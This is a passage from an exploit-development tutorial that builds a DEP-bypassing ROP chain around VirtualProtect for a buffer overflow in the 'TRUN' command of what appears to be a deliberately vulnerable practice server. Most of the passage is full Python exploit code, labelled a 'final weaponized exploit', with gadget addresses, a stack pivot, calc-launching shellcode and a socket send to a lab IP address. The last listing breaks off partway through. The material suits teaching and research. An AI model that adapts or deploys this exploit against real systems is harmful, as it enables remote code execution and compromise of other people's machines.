  • Make the current size parameter placeholder point to this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 300 into EAX. We have already found a gadget from one of the previous gadgets! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (100 * 3 = 300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds a value that is equal to the lpAddress parameter placeholder. We will increase EDX by four bytes- so it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Again, that pesky ret 0x000C is present again. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find any viable pointers through any of the ROP gadgets I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make-do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll

Again, EDX is now pointed to the size parameter placeholder. Using EDX again, increment by four- to place the location of the flNewProtect placeholder parameter in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewPRotect resides:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX get “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) it manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now, is we need to jump back to the VirtualProtect call! but how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first “parameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().

However, in assembly, one of the best registers to make calculations to is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which contains the call to VirtualProtect() with ESP). At this point, the VirtualProtect() address will be in ESP. Since the exchange instruction will be apart of a ROP gadget, the ret at the end of the gadget will load new ESP (the VirtualProtect() address) into EIP- and thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since then, thus our shellcode is no longer located 100 bytes from the VirtualProtect() parameters.

There is a simple solution to this: we will make the address of return and lpAddress 100 bytes greater.

This will be changed at this part of the POC:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

We will update it to the following, to make it 100 bytes greater, and land around our shellcode:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget---
---

ROP gadgets for decrementing ECX, moving ECX into EAX, and exchanging EAX with ESP:

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, this is the final weaponized exploit has been created:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
